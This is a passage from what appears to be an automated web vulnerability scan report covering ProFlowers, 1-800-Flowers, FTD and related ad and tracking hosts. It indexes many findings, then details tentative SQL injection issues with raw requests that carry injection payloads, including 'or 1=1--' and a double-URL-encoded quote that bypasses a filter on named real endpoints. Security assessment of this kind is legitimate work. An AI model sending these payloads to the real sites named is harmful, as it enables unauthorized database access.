4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]

4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]

4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ads.undertone.com/crossdomain.xml

5.3. http://adsfac.us/crossdomain.xml

5.4. http://at.amgdgt.com/crossdomain.xml

5.5. http://b.scorecardresearch.com/crossdomain.xml

5.6. http://blooms.1800flowers.com/crossdomain.xml

5.7. http://bp.specificclick.net/crossdomain.xml

5.8. http://data.cmcore.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://idcs.interclick.com/crossdomain.xml

5.11. http://metrics.ftd.com/crossdomain.xml

5.12. http://pix04.revsci.net/crossdomain.xml

5.13. http://pixel.fetchback.com/crossdomain.xml

5.14. http://pixel.quantserve.com/crossdomain.xml

5.15. http://recs.richrelevance.com/crossdomain.xml

5.16. http://segment-pixel.invitemedia.com/crossdomain.xml

5.17. http://wa.proflowers.com/crossdomain.xml

5.18. http://googleads.g.doubleclick.net/crossdomain.xml

5.19. http://static.ak.fbcdn.net/crossdomain.xml

5.20. http://w.sharethis.com/crossdomain.xml

5.21. http://www.facebook.com/crossdomain.xml

5.22. http://www.ftd.com/crossdomain.xml

5.23. http://www.res-x.com/crossdomain.xml

5.24. http://www.proflowers.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://metrics.ftd.com/clientaccesspolicy.xml

6.4. http://wa.proflowers.com/clientaccesspolicy.xml

7. Cleartext submission of password

8. SSL cookie without secure flag set

8.1. https://accounts.proflowers.com/Default.aspx

8.2. https://ww30.1800flowers.com/checkoutsignin.do

8.3. https://ww30.1800flowers.com/continueasguest.do

8.4. https://accounts.proflowers.com/CustomerLogin.aspx

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://sales.liveperson.net/hc/87011923/

9.3. http://t.p.mybuys.com/webrec/wr.do

10. Password field submitted using GET method

10.1. http://www.ftd.com/

10.2. http://www.ftd.com/

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]

12. Cookie scoped to parent domain

12.1. http://ww30.1800baskets.com/include/cookieCloner.asp

12.2. http://ww30.1800flowers.com/

12.3. http://www.cherrymoonfarms.com/default.aspx

12.4. http://www.personalcreations.com/default.aspx

12.5. http://www.proflowers.com/

12.6. http://www.proflowers.com/house-plants-PBS

12.7. http://www.proflowers.com/mothers-day-flowers-MDF

12.8. http://www.proflowers.com/send-flowers-bsl

12.9. https://accounts.proflowers.com/CustomerLogin.aspx

12.10. https://accounts.proflowers.com/Default.aspx

12.11. http://ad.trafficmp.com/a/bpix

12.12. http://ads.revsci.net/adserver/ako

12.13. http://ads.revsci.net/adserver/ako

12.14. http://ads.revsci.net/adserver/ako

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://at.amgdgt.com/ads/

12.20. http://b.scorecardresearch.com/b

12.21. http://ib.adnxs.com/seg

12.22. http://idcs.interclick.com/Segment.aspx

12.23. http://leadback.advertising.com/adcedge/lb

12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.30. http://pixel.fetchback.com/serve/fb/pdc

12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

12.32. http://pixel.rubiconproject.com/tap.php

12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

12.36. http://segment-pixel.invitemedia.com/pixel

12.37. http://t.p.mybuys.com/webrec/wr.do

12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

12.39. http://www.ftd.com/351

13. Cookie without HttpOnly flag set

13.1. http://blooms.1800flowers.com/cm

13.2. http://t.p.mybuys.com/webrec/wr.do

13.3. http://ww30.1800baskets.com/deliverycalendarnew.do

13.4. http://ww30.1800baskets.com/include/cookieCloner.asp

13.5. http://ww30.1800baskets.com/shoppingbasket.do

13.6. http://ww30.1800baskets.com/template.do

13.7. http://ww30.1800flowers.com/

13.8. http://ww30.1800flowers.com/collection.do

13.9. http://ww30.1800flowers.com/deliverycalendarnew.do

13.10. http://ww30.1800flowers.com/guidedmodel.do

13.11. http://ww30.1800flowers.com/product.do

13.12. http://ww30.1800flowers.com/shoppingbasket.do

13.13. https://ww30.1800flowers.com/checkoutsignin.do

13.14. https://ww30.1800flowers.com/continueasguest.do

13.15. http://www.cherrymoonfarms.com/default.aspx

13.16. http://www.personalcreations.com/default.aspx

13.17. http://www.proflowers.com/

13.18. http://www.proflowers.com/house-plants-PBS

13.19. http://www.proflowers.com/mothers-day-flowers-MDF

13.20. http://www.proflowers.com/send-flowers-bsl

13.21. https://accounts.proflowers.com/CustomerLogin.aspx

13.22. https://accounts.proflowers.com/Default.aspx

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ads.revsci.net/adserver/ako

13.26. http://ads.revsci.net/adserver/ako

13.27. http://ads.revsci.net/adserver/ako

13.28. http://ads.revsci.net/adserver/ako

13.29. http://ads.revsci.net/adserver/ako

13.30. http://ads.revsci.net/adserver/ako

13.31. http://ads.revsci.net/adserver/ako

13.32. http://ads.undertone.com/fc.php

13.33. http://at.amgdgt.com/ads/

13.34. http://b.scorecardresearch.com/b

13.35. http://blooms.1800flowers.com/cm

13.36. http://ftd.com/

13.37. http://idcs.interclick.com/Segment.aspx

13.38. http://leadback.advertising.com/adcedge/lb

13.39. http://login.dotomi.com/ucm/UCMController

13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.46. http://pixel.fetchback.com/serve/fb/pdc

13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

13.48. http://pixel.rubiconproject.com/tap.php

13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.55. http://segment-pixel.invitemedia.com/pixel

13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

13.57. http://www.ftd.com/351

14. Password field with autocomplete enabled

14.1. https://accounts.proflowers.com/CustomerLogin.aspx

14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

14.3. http://ww30.1800baskets.com/product.do

14.4. https://ww30.1800flowers.com/checkoutsignin.do

14.5. http://www.ftd.com/

14.6. http://www.ftd.com/

14.7. http://www.ftd.com/

14.8. http://www.ftd.com/

14.9. http://www.ftd.com/

15. Referer-dependent response

15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

15.4. http://www.facebook.com/plugins/like.php

16. Cross-domain Referer leakage

16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

16.3. https://accounts.proflowers.com/CustomerLogin.aspx

16.4. https://accounts.proflowers.com/Default.aspx

16.5. http://adsfac.us/pct_mx.asp

16.6. http://adsfac.us/pct_mx.asp

16.7. http://adsfac.us/pct_mx.asp

16.8. http://bp.specificclick.net/

16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

16.16. http://pixel.fetchback.com/serve/fb/pdc

16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

16.21. http://ww30.1800baskets.com/deliverycalendarnew.do

16.22. http://ww30.1800baskets.com/product.do

16.23. http://ww30.1800baskets.com/template.do

16.24. http://ww30.1800flowers.com/collection.do

16.25. http://ww30.1800flowers.com/product.do

16.26. http://www.cherrymoonfarms.com/default.aspx

16.27. http://www.facebook.com/plugins/like.php

16.28. http://www.personalcreations.com/default.aspx

16.29. http://www.proflowers.com/default.aspx

16.30. http://www.proflowers.com/house-plants-PBS

16.31. http://www.proflowers.com/mothers-day-flowers-MDF

16.32. http://www.proflowers.com/send-flowers-bsl

17. Cross-domain script include

17.1. https://accounts.proflowers.com/CustomerLogin.aspx

17.2. https://accounts.proflowers.com/Default.aspx

17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

17.9. http://pixel.fetchback.com/serve/fb/pdc

17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

17.13. http://ww30.1800baskets.com/deliverycalendarnew.do

17.14. http://ww30.1800baskets.com/product.do

17.15. http://ww30.1800baskets.com/shoppingbasket.do

17.16. http://ww30.1800baskets.com/template.do

17.17. http://ww30.1800flowers.com/

17.18. http://ww30.1800flowers.com/collection.do

17.19. http://ww30.1800flowers.com/product.do

17.20. http://ww30.1800flowers.com/shoppingbasket.do

17.21. https://ww30.1800flowers.com/checkoutsignin.do

17.22. https://ww30.1800flowers.com/continueasguest.do

17.23. http://www.cherrymoonfarms.com/default.aspx

17.24. http://www.facebook.com/plugins/like.php

17.25. http://www.ftd.com/

17.26. http://www.personalcreations.com/default.aspx

17.27. http://www.proflowers.com/

17.28. http://www.proflowers.com/default.aspx

17.29. http://www.proflowers.com/house-plants-PBS

17.30. http://www.proflowers.com/mothers-day-flowers-MDF

17.31. http://www.proflowers.com/send-flowers-bsl

18. TRACE method is enabled

18.1. http://att.adpxpx.com/

18.2. http://bp.specificclick.net/

18.3. http://metrics.ftd.com/

18.4. http://pixel.fetchback.com/

18.5. http://pixel.rubiconproject.com/

19. Email addresses disclosed

19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js

19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

19.4. https://ww30.1800flowers.com/checkoutsignin.do

19.5. http://www.ftd.com/

20. Private IP addresses disclosed

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.facebook.com/plugins/like.php

20.4. http://www.facebook.com/plugins/like.php

21. Robots.txt file

21.1. http://ad.doubleclick.net/activity

21.2. http://ads.undertone.com/fc.php

21.3. http://adsfac.us/pct_mx.asp

21.4. http://at.amgdgt.com/ads/

21.5. http://b.scorecardresearch.com/b

21.6. http://blooms.1800flowers.com/cm

21.7. http://data.cmcore.com/cookie-id.js

21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/

21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico

21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css

21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico

21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

21.15. http://pixel.fetchback.com/serve/fb/pdc

21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash

21.20. http://segment-pixel.invitemedia.com/pixel

21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.22. http://t.p.mybuys.com/webrec/wr.do

21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query

21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

21.26. http://ww30.1800baskets.com/include/cookieCloner.asp

21.27. http://ww30.1800flowers.com/

21.28. https://ww30.1800flowers.com/checkoutsignin.do

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.ftd.com/

21.31. http://www.google-analytics.com/__utm.gif

21.32. http://www.googleadservices.com/pagead/conversion/1014041578/

21.33. http://www.proflowers.com/

21.34. http://www.res-x.com/ws/r2/Resonance.aspx

22. Cacheable HTTPS response

22.1. https://accounts.proflowers.com/CustomerLogin.aspx

22.2. https://accounts.proflowers.com/Default.aspx

22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

23. HTML does not specify charset

23.1. http://a1128.g.akamai.net/favicon.ico

23.2. http://adsfac.us/pct_mx.asp

23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

23.4. http://recs.richrelevance.com/favicon.ico

23.5. http://www.ftd.com/

23.6. http://www.ftd.com/empty/index.epl

23.7. http://www.ftd.com/empty/tealeaf.epl

24. Content type incorrectly stated

24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

24.2. http://sales.liveperson.net/hcp/html/mTag.js

24.3. http://www.res-x.com/ws/r2/Resonance.aspx

25. SSL certificate

25.1. https://orders.proflowers.com/

25.2. https://ww30.1800flowers.com/


1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rrserver'/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1036

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver''/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Connection: keep-alive
Content-Length: 0

1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /rrserver%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:07 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1048

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver%2527%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:08 GMT
Connection: keep-alive
Content-Length: 0

1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

The month parameter appears to be vulnerable to SQL injection attacks. The payloads 12903751%20or%201%3d1--%20 and 12903751%20or%201%3d2--%20 were each submitted in the month parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /deliverycalendarnew.do?month=512903751%20or%201%3d1--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
